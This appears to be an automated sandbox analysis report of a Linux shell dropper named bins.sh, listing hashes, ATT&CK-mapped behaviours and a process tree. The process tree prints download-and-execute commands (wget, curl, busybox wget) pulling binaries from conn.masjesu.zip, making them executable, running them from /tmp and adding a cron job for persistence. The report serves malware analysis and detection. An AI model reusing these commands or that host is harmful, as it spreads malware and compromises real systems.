Analysis
-
max time kernel
150s -
max time network
154s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
04-11-2024 21:22
Static task
static1
Behavioral task
behavioral1
Sample
bins.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
bins.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
bins.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
bins.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
bins.sh
-
Size
10KB
-
MD5
41b94196f704ad7c3697022b3e4ea893
-
SHA1
4051a27e6c6dd7dccb725ab92e8c7dea796c72e3
-
SHA256
ee6db48d4a61adc6012c6afd4d9f710bd063ce9ce5843007de2d905d9ded473b
-
SHA512
46596bb551d352dd6c2c1526b28b6b8f5ed92639fdfedbc4129ea2c1b9c5e669f6b826a6bf4ec8a5c70115cc47a49a59585fe583f5b17ced0d102e5cd6ebdacd
-
SSDEEP
192:zDl9wXPD1sL99yFRf6znqFlZiPpl9v99yFRkznqFlNM:zDl9wXr1sMN6znqFlZixl9oWznqFlNM
Malware Config
Signatures
-
Contacts a large (2042) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 4 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodchmodchmodchmodpid Process 677 chmod 773 chmod 779 chmod 787 chmod -
Executes dropped EXE 1 IoCs
Processes:
3VGb0gvwOKP3FgPpnbM0qZLe9IQE2UGPhqioc pid Process /tmp/3VGb0gvwOKP3FgPpnbM0qZLe9IQE2UGPhq 678 3VGb0gvwOKP3FgPpnbM0qZLe9IQE2UGPhq -
Renames itself 1 IoCs
Processes:
3VGb0gvwOKP3FgPpnbM0qZLe9IQE2UGPhqpid Process 679 3VGb0gvwOKP3FgPpnbM0qZLe9IQE2UGPhq -
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
Processes:
crontabdescription ioc Process File opened for modification /var/spool/cron/crontabs/tmp.hVkzFB crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
Checks CPU configuration 1 TTPs 1 IoCs
Checks CPU information which indicate if the system is a virtual machine.
Processes:
curldescription ioc Process File opened for reading /proc/cpuinfo curl -
Processes:
3VGb0gvwOKP3FgPpnbM0qZLe9IQE2UGPhqcrontabdescription ioc Process File opened for reading /proc/11/cmdline 3VGb0gvwOKP3FgPpnbM0qZLe9IQE2UGPhq File opened for reading /proc/107/cmdline 3VGb0gvwOKP3FgPpnbM0qZLe9IQE2UGPhq File opened for reading /proc/761/cmdline 3VGb0gvwOKP3FgPpnbM0qZLe9IQE2UGPhq File opened for reading /proc/763/cmdline 3VGb0gvwOKP3FgPpnbM0qZLe9IQE2UGPhq File opened for reading /proc/783/cmdline 3VGb0gvwOKP3FgPpnbM0qZLe9IQE2UGPhq File opened for reading /proc/894/cmdline 3VGb0gvwOKP3FgPpnbM0qZLe9IQE2UGPhq File opened for reading /proc/1009/cmdline 3VGb0gvwOKP3FgPpnbM0qZLe9IQE2UGPhq File opened for reading /proc/698/cmdline 3VGb0gvwOKP3FgPpnbM0qZLe9IQE2UGPhq File opened for reading /proc/757/cmdline 3VGb0gvwOKP3FgPpnbM0qZLe9IQE2UGPhq File opened for reading /proc/767/cmdline 3VGb0gvwOKP3FgPpnbM0qZLe9IQE2UGPhq File opened for reading /proc/951/cmdline 3VGb0gvwOKP3FgPpnbM0qZLe9IQE2UGPhq File opened for reading /proc/958/cmdline 3VGb0gvwOKP3FgPpnbM0qZLe9IQE2UGPhq File opened for reading /proc/971/cmdline 3VGb0gvwOKP3FgPpnbM0qZLe9IQE2UGPhq File opened for reading /proc/759/cmdline 3VGb0gvwOKP3FgPpnbM0qZLe9IQE2UGPhq File opened for reading /proc/766/cmdline 3VGb0gvwOKP3FgPpnbM0qZLe9IQE2UGPhq File opened for reading /proc/933/cmdline 3VGb0gvwOKP3FgPpnbM0qZLe9IQE2UGPhq File opened for reading /proc/714/cmdline 3VGb0gvwOKP3FgPpnbM0qZLe9IQE2UGPhq File opened for reading /proc/728/cmdline 3VGb0gvwOKP3FgPpnbM0qZLe9IQE2UGPhq File opened for reading /proc/852/cmdline 3VGb0gvwOKP3FgPpnbM0qZLe9IQE2UGPhq File opened for reading /proc/985/cmdline 3VGb0gvwOKP3FgPpnbM0qZLe9IQE2UGPhq File opened for reading /proc/1025/cmdline 3VGb0gvwOKP3FgPpnbM0qZLe9IQE2UGPhq File opened for reading /proc/2/cmdline 3VGb0gvwOKP3FgPpnbM0qZLe9IQE2UGPhq File opened for reading /proc/696/cmdline 3VGb0gvwOKP3FgPpnbM0qZLe9IQE2UGPhq File opened for reading /proc/717/cmdline 3VGb0gvwOKP3FgPpnbM0qZLe9IQE2UGPhq File opened for reading /proc/841/cmdline 3VGb0gvwOKP3FgPpnbM0qZLe9IQE2UGPhq File opened for reading /proc/882/cmdline 3VGb0gvwOKP3FgPpnbM0qZLe9IQE2UGPhq File opened for reading /proc/984/cmdline 3VGb0gvwOKP3FgPpnbM0qZLe9IQE2UGPhq File opened for reading /proc/946/cmdline 3VGb0gvwOKP3FgPpnbM0qZLe9IQE2UGPhq File opened for reading /proc/950/cmdline 3VGb0gvwOKP3FgPpnbM0qZLe9IQE2UGPhq File opened for reading /proc/filesystems crontab File opened for reading /proc/41/cmdline 3VGb0gvwOKP3FgPpnbM0qZLe9IQE2UGPhq File opened for reading /proc/774/cmdline 3VGb0gvwOKP3FgPpnbM0qZLe9IQE2UGPhq File opened for reading /proc/797/cmdline 3VGb0gvwOKP3FgPpnbM0qZLe9IQE2UGPhq File opened for reading /proc/832/cmdline 3VGb0gvwOKP3FgPpnbM0qZLe9IQE2UGPhq File opened for reading /proc/893/cmdline 3VGb0gvwOKP3FgPpnbM0qZLe9IQE2UGPhq File opened for reading /proc/972/cmdline 3VGb0gvwOKP3FgPpnbM0qZLe9IQE2UGPhq File opened for reading /proc/1014/cmdline 3VGb0gvwOKP3FgPpnbM0qZLe9IQE2UGPhq File opened for reading /proc/1027/cmdline 3VGb0gvwOKP3FgPpnbM0qZLe9IQE2UGPhq File opened for reading /proc/959/cmdline 3VGb0gvwOKP3FgPpnbM0qZLe9IQE2UGPhq File opened for reading /proc/271/cmdline 3VGb0gvwOKP3FgPpnbM0qZLe9IQE2UGPhq File opened for reading /proc/744/cmdline 3VGb0gvwOKP3FgPpnbM0qZLe9IQE2UGPhq File opened for reading /proc/760/cmdline 3VGb0gvwOKP3FgPpnbM0qZLe9IQE2UGPhq File opened for reading /proc/902/cmdline 3VGb0gvwOKP3FgPpnbM0qZLe9IQE2UGPhq File opened for reading /proc/754/cmdline 3VGb0gvwOKP3FgPpnbM0qZLe9IQE2UGPhq File opened for reading /proc/800/cmdline 3VGb0gvwOKP3FgPpnbM0qZLe9IQE2UGPhq File opened for reading /proc/994/cmdline 3VGb0gvwOKP3FgPpnbM0qZLe9IQE2UGPhq File opened for reading /proc/703/cmdline 3VGb0gvwOKP3FgPpnbM0qZLe9IQE2UGPhq File opened for reading /proc/747/cmdline 3VGb0gvwOKP3FgPpnbM0qZLe9IQE2UGPhq File opened for reading /proc/771/cmdline 3VGb0gvwOKP3FgPpnbM0qZLe9IQE2UGPhq File opened for reading /proc/843/cmdline 3VGb0gvwOKP3FgPpnbM0qZLe9IQE2UGPhq File opened for reading /proc/858/cmdline 3VGb0gvwOKP3FgPpnbM0qZLe9IQE2UGPhq File opened for reading /proc/986/cmdline 3VGb0gvwOKP3FgPpnbM0qZLe9IQE2UGPhq File opened for reading /proc/928/cmdline 3VGb0gvwOKP3FgPpnbM0qZLe9IQE2UGPhq File opened for reading /proc/1022/cmdline 3VGb0gvwOKP3FgPpnbM0qZLe9IQE2UGPhq File opened for reading /proc/772/cmdline 3VGb0gvwOKP3FgPpnbM0qZLe9IQE2UGPhq File opened for reading /proc/809/cmdline 3VGb0gvwOKP3FgPpnbM0qZLe9IQE2UGPhq File opened for reading /proc/822/cmdline 3VGb0gvwOKP3FgPpnbM0qZLe9IQE2UGPhq File opened for reading /proc/877/cmdline 3VGb0gvwOKP3FgPpnbM0qZLe9IQE2UGPhq File opened for reading /proc/930/cmdline 3VGb0gvwOKP3FgPpnbM0qZLe9IQE2UGPhq File opened for reading /proc/1010/cmdline 3VGb0gvwOKP3FgPpnbM0qZLe9IQE2UGPhq File opened for reading /proc/999/cmdline 3VGb0gvwOKP3FgPpnbM0qZLe9IQE2UGPhq File opened for reading /proc/644/cmdline 3VGb0gvwOKP3FgPpnbM0qZLe9IQE2UGPhq File opened for reading /proc/751/cmdline 3VGb0gvwOKP3FgPpnbM0qZLe9IQE2UGPhq File opened for reading /proc/887/cmdline 3VGb0gvwOKP3FgPpnbM0qZLe9IQE2UGPhq -
System Network Configuration Discovery 1 TTPs 13 IoCs
Adversaries may gather information about the network configuration of a system.
Processes:
wgetcurlbusyboxcurlbusyboxwgetcurlbusyboxwgetwgetcurlbusyboxwgetpid Process 782 wget 691 curl 772 busybox 777 curl 778 busybox 776 wget 783 curl 784 busybox 790 wget 653 wget 658 curl 674 busybox 690 wget -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
Processes:
curldescription ioc Process File opened for modification /tmp/3VGb0gvwOKP3FgPpnbM0qZLe9IQE2UGPhq curl
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵PID:647
-
/bin/rm/bin/rm bins.sh2⤵PID:651
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/3VGb0gvwOKP3FgPpnbM0qZLe9IQE2UGPhq2⤵
- System Network Configuration Discovery
PID:653
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/3VGb0gvwOKP3FgPpnbM0qZLe9IQE2UGPhq2⤵
- Checks CPU configuration
- System Network Configuration Discovery
- Writes file to tmp directory
PID:658
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/3VGb0gvwOKP3FgPpnbM0qZLe9IQE2UGPhq2⤵
- System Network Configuration Discovery
PID:674
-
-
/bin/chmodchmod 777 3VGb0gvwOKP3FgPpnbM0qZLe9IQE2UGPhq2⤵
- File and Directory Permissions Modification
PID:677
-
-
/tmp/3VGb0gvwOKP3FgPpnbM0qZLe9IQE2UGPhq./3VGb0gvwOKP3FgPpnbM0qZLe9IQE2UGPhq2⤵
- Executes dropped EXE
- Renames itself
- Reads runtime system information
PID:678 -
/bin/shsh -c "crontab -l"3⤵PID:680
-
/usr/bin/crontabcrontab -l4⤵
- Reads runtime system information
PID:681
-
-
-
/bin/shsh -c "crontab -"3⤵PID:683
-
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
PID:684
-
-
-
-
/bin/rmrm 3VGb0gvwOKP3FgPpnbM0qZLe9IQE2UGPhq2⤵PID:686
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/q8L7Nf4v4nWCeQdj5uFk6ooIuCHu2YZ0fF2⤵
- System Network Configuration Discovery
PID:690
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/q8L7Nf4v4nWCeQdj5uFk6ooIuCHu2YZ0fF2⤵
- System Network Configuration Discovery
PID:691
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/q8L7Nf4v4nWCeQdj5uFk6ooIuCHu2YZ0fF2⤵
- System Network Configuration Discovery
PID:772
-
-
/bin/chmodchmod 777 q8L7Nf4v4nWCeQdj5uFk6ooIuCHu2YZ0fF2⤵
- File and Directory Permissions Modification
PID:773
-
-
/tmp/q8L7Nf4v4nWCeQdj5uFk6ooIuCHu2YZ0fF./q8L7Nf4v4nWCeQdj5uFk6ooIuCHu2YZ0fF2⤵PID:774
-
-
/bin/rmrm q8L7Nf4v4nWCeQdj5uFk6ooIuCHu2YZ0fF2⤵PID:775
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/GTzGbuekv82AYjNujuq9hoRr8lG7vB39Re2⤵
- System Network Configuration Discovery
PID:776
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/GTzGbuekv82AYjNujuq9hoRr8lG7vB39Re2⤵
- System Network Configuration Discovery
PID:777
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/GTzGbuekv82AYjNujuq9hoRr8lG7vB39Re2⤵
- System Network Configuration Discovery
PID:778
-
-
/bin/chmodchmod 777 GTzGbuekv82AYjNujuq9hoRr8lG7vB39Re2⤵
- File and Directory Permissions Modification
PID:779
-
-
/tmp/GTzGbuekv82AYjNujuq9hoRr8lG7vB39Re./GTzGbuekv82AYjNujuq9hoRr8lG7vB39Re2⤵PID:780
-
-
/bin/rmrm GTzGbuekv82AYjNujuq9hoRr8lG7vB39Re2⤵PID:781
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/E2wNZ7yKREMYc1cnARbkEc0CzhdNuWIlHc2⤵
- System Network Configuration Discovery
PID:782
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/E2wNZ7yKREMYc1cnARbkEc0CzhdNuWIlHc2⤵
- System Network Configuration Discovery
PID:783
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/E2wNZ7yKREMYc1cnARbkEc0CzhdNuWIlHc2⤵
- System Network Configuration Discovery
PID:784
-
-
/bin/chmodchmod 777 E2wNZ7yKREMYc1cnARbkEc0CzhdNuWIlHc2⤵
- File and Directory Permissions Modification
PID:787
-
-
/tmp/E2wNZ7yKREMYc1cnARbkEc0CzhdNuWIlHc./E2wNZ7yKREMYc1cnARbkEc0CzhdNuWIlHc2⤵PID:788
-
-
/bin/rmrm E2wNZ7yKREMYc1cnARbkEc0CzhdNuWIlHc2⤵PID:789
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/8WFounZGbZXsMF4FelpDqK2Vxd7WpulXMs2⤵
- System Network Configuration Discovery
PID:790
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
141KB
MD53ca8decdb1e52c423c521bfff02ac200
SHA18621ecd6807109b8541912ad9e134f6fb49bfd48
SHA256dee3a1252e88f188c362e08b16ece678559ad2566511871f5cde69296f6c779f
SHA512b6f89d7875d584c109f30814738fec4fe04619745941d9cbbff20bbefbab454dee7180321f6913da1a3b89fba2dc743b28631e52261539d091cc802a5c7a1c7a
-
Filesize
210B
MD583501a8b256c5b4ca270b67078e4a7e1
SHA1ac6bb053113fd3b10440d025aa3e1f88b3cd8598
SHA2567d83ce19ced840637d8b26a84d8a1864c12547acc6a9ef2f7e0c6d8b3a6d8451
SHA5123ac20b87912469443cbab3cbeeabcf243ade39c848df6bb079a6f545f98b4f08b89b6257e0d48ff19ce04b3a6ccf49af4c07093774c4aa751407c6f640793554